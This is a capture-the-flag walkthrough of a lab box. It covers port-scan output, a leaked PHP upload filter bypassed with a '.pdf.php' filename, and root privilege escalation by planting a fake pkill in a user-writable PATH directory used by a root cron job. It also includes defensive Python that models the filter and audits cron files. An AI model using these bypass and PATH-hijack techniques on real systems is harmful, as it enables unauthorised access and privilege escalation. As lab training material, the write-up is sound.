└─[$] rustscan -t 2000 -a 10.10.33.194 -- -sC -sV
<<--SNIP-->>
Open 10.10.33.194:22
Open 10.10.33.194:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sC -sV" on ip 10.10.33.194
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-16 15:36 IST
<<--SNIP-->>
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 9f:a6:01:53:92:3a:1d:ba:d7:18:18:5c:0d:8e:92:2c (RSA)
|   256 4b:60:dc:fb:92:a8:6f:fc:74:53:64:c1:8c:bd:de:7c (ECDSA)
|_  256 83:d4:9c:d0:90:36:ce:83:f7:c7:53:30:28:df:c3:d5 (ED25519)
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-favicon: Unknown favicon MD5: DD1493059959BA895A46C026C39C36EF
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: RecruitSec: Industry Leading Infosec Recruitment
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
<<--SNIP-->>
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.48 seconds
Looking through the directories found, nothing useful turned up.
After uploading a PDF file in the upload section, we can see the upload handler's source code in the intercepted response:
HTTP/1.1 200 OK
Date: Tue, 16 Aug 2022 10:55:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 552
Connection: close
Content-Type: text/html; charset=UTF-8

Hacked! If you dont want me to upload my shell, do better at filtering!
<!-- seriously, dumb stuff:
$target_dir = "cvs/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
if (!strpos($target_file, ".pdf")) {
  echo "Only PDF CVs are accepted.";
} else if (file_exists($target_file)) {
  echo "This CV has already been uploaded!";
} else if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
  echo "Success! We will get back to you.";
} else {
  echo "Something went wrong :|";
}
-->
I tried to upload a PDF file, but it returned the same response, which made me think that the hacker must have used the same technique to bypass the filtering and get a shell onto the server. That means the hacker's shell/payload is still on the server, and we can use it to get a shell ourselves.
As the server uses PHP and we have seen the source code, we know the upload handler only checks with strpos() that the name contains .pdf somewhere, so as long as the filename still has .php in it (for example .pdf.php) we are good to go.
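To make the filter's behaviour concrete, here is an added Python model (not the site's PHP and not from the original post) of the quoted strpos() check beside a hardened version of the same handler; php_strpos, vulnerable_accepts, hardened_accepts and storage_name are names chosen here, and the sample filenames are constructed.

```python
"""Model of the CV upload filter quoted above (added example, not the
site's PHP). PHP strpos() returns the offset of the first match or false,
so `if (!strpos($target_file, ".pdf"))` only asks whether ".pdf" occurs
anywhere in the name; it never looks at the real extension.
hardened_accepts() shows the checks a fixed handler would make instead.
All sample names are constructed."""
import posixpath
import secrets

ALLOWED_EXT = {"pdf"}

def php_strpos(haystack, needle):
    """PHP semantics: 0-based offset of the first match, or False if absent."""
    idx = haystack.find(needle)
    return False if idx < 0 else idx

def vulnerable_accepts(filename):
    """Port of the quoted check. PHP treats both false and 0 as falsy, but the
    "cvs/" prefix means ".pdf" can never sit at offset 0, so this reduces to:
    does the name contain ".pdf" anywhere (cv.pdf, shell.pdf.php, ...)?"""
    target_file = "cvs/" + posixpath.basename(filename)
    return bool(php_strpos(target_file, ".pdf"))

def hardened_accepts(filename, head=b""):
    """Accept only a plain single-extension .pdf name whose first bytes look
    like a PDF; head is the beginning of the uploaded content."""
    name = posixpath.basename(filename)
    if name != filename or name in ("", ".", ".."):
        return False  # path separators or empty names
    stem, dot, ext = name.rpartition(".")
    if not dot or not stem or "." in stem:
        return False  # no extension, or multi-extension names like cv.php.pdf
    if ext.lower() not in ALLOWED_EXT:
        return False  # the final extension is what decides the handler
    return head.startswith(b"%PDF-")  # content must look like a PDF too

def storage_name():
    """Never store under the user-supplied name; generate one server-side."""
    return secrets.token_hex(16) + ".pdf"
```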
I fuzzed /cvs, guessing the extension .pdf.php.
└─[$] ssh lachlan@10.10.117.45
The authenticity of host '10.10.117.45 (10.10.117.45)' can't be established.
ED25519 key fingerprint is SHA256:2RN2fsvo4NewQ4PV/D/U+gbDQND2ckUUnofzShfqqJk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.117.45' (ED25519) to the list of known hosts.
lachlan@10.10.117.45's password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 16 Aug 2022 11:57:49 AM UTC

  System load:  0.24               Processes:             121
  Usage of /:   25.6% of 9.78GB    Users logged in:       0
  Memory usage: 52%                IPv4 address for eth0: 10.10.117.45
  Swap usage:   0%

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May  5 04:39:19 2022 from 192.168.56.1
$ nope
Connection to 10.10.117.45 closed.
Let's check out the file we noticed in .bash_history that the hacker might have edited:
$ cat /etc/cron.d/persistence
PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
As you can see, the cron jobs run every 10 seconds, echo "nope" into every /dev/pts device and then kill the session attached to it.
What is /dev/pts?
Think of it as the directory of pseudo-terminal device files: each open terminal session has one, and it carries that terminal's input and output.
To see it for yourself, type tty in your current shell, then in a new shell type echo hello > /dev/pts/<shell_no>, and "hello" appears in the first shell.
Hmmmm, what next?
Now, as we can see, the $PATH variable is declared inside the cron file:
PATH=/home/lachlan/bin:/bin:/usr/bin
So cron looks for binaries first in /home/lachlan/bin, then in /bin, and finally in /usr/bin.
User Shell
All the other binaries in the cron job are called by absolute path, but pkill is called by a bare (relative) name, which means cron resolves it through that PATH. If we create a binary named pkill in our home directory's bin folder (/home/lachlan/bin), it is found before the real one and the kill never takes effect.
As we can see, we have successfully edited pkill.
Let's try for the shell:
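As an added example (not from the original post), the following Python audit script checks a cron.d file for exactly this pattern: a user-writable directory in PATH plus a job command called by bare name. The function names and SAMPLE_CRON, constructed from the listing above, are assumptions made here.

```python
"""Audit a cron.d-style file for the PATH hijack shown above (added example,
not from the post). Flags PATH entries an unprivileged user can write to and
job commands called by bare name, which cron resolves through that PATH as
the job's user. SAMPLE_CRON is constructed from the listing above."""
import os
import re
import stat
from itertools import dropwhile

SAMPLE_CRON = """PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
"""
KEYWORDS = {"do", "done", "if", "then", "else", "elif", "fi", "while", "until"}

def command_words(command):
    """Program name of each simple command in a shell one-liner."""
    command = re.sub(r"\bfor\s+\w+\s+in\b", "", command)  # loop headers run nothing
    segments = re.split(r"\s*(?:&&|\|\||;|\||`)\s*", command)  # operators, subshells
    heads = (list(dropwhile(KEYWORDS.__contains__, s.split()))[:1] for s in segments)
    return [h[0] for h in heads if h]

def writable_by_non_root(directory):
    """Safe only when root-owned and not group/world writable; absent is unsafe."""
    if not os.path.isdir(directory):
        return True
    st = os.stat(directory)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_cron(text, user_writable=None):
    """Return (line_number, finding) pairs; user_writable overrides the stat check."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        env = re.match(r"^(\w+)\s*=\s*(.*)$", line)
        if env:  # environment assignment; only PATH matters for lookups
            for d in env.group(2).strip("\"'").split(":") if env.group(1) == "PATH" else []:
                if (d in user_writable) if user_writable is not None else writable_by_non_root(d):
                    findings.append((lineno, f"PATH entry {d} is writable by an unprivileged user"))
            continue
        fields = line.split(None, 6)  # 5 schedule fields, user, command
        if len(fields) < 7:
            continue  # @reboot-style entries are not handled here
        user, command = fields[5], fields[6]
        for word in command_words(command):
            if "/" not in word:
                findings.append((lineno, f"'{word}' is resolved via PATH and runs as {user}"))
    return findings
```

Running audit_cron(SAMPLE_CRON, {"/home/lachlan/bin"}) reports the writable PATH entry on line 1 and the bare pkill on line 3; on a live host, omit the second argument and the directories are checked with os.stat.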
└─[$] ssh lachlan@10.10.19.188
lachlan@10.10.19.188's password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 16 Aug 2022 02:01:14 PM UTC

  System load:  0.29               Processes:             126
  Usage of /:   25.0% of 9.78GB    Users logged in:       0
  Memory usage: 48%                IPv4 address for eth0: 10.10.19.188
  Swap usage:   0%

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu May  5 04:39:19 2022 from 192.168.56.1
$ bash
lachlan@b2r:~$
lachlan@b2r:~$ id
uid=1001(lachlan) gid=1001(lachlan) groups=1001(lachlan)
lachlan@b2r:~$ nope
lachlan@b2r:~$
We still see the echoed "nope", but the shell remains.
Root shell
As pkill and the rest of the cron job run every 10 seconds with root privileges, we can edit ./bin/pkill and get a root shell.
Editing and adding a reverse-shell payload inside /home/lachlan/bin/pkill.